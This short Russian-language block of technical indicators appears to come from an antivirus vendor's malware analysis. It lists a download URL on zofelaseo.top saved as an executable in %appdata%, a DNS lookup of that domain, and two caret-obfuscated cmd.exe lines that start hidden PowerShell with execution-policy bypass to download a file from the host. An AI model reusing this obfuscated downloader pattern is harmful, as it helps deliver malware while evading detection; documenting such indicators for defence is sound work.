Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powErS^HelL^.E^xE -eXeCUTI^OnpoLIcY^ byPASs^ -N^Opr^o^f^ILe^ -wInDoWSt^Y^Le^ H^i^D^D^En^ (NE^w-o^bJE^cT SYsTEM^.net^.w^E^BC^l^IEN^t)^.^dOWnl^Oa^dF^iLE(^'http://zofelaseo.top/read...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "powErS^HelL^.E^xE -eXeCUTI^OnpoLIcY^ byPASs^ -N^Opr^o^f^ILe^ -wInDoWSt^Y^Le^ H^i^D^D^En^ (NE^w-o^bJE^cT SYsTEM^.net^.w^E^BC^l^IEN^t)^.^dOWnl^Oa^dF^iLE(^'http://zofelaseo.top/read...' (со скрытым окном)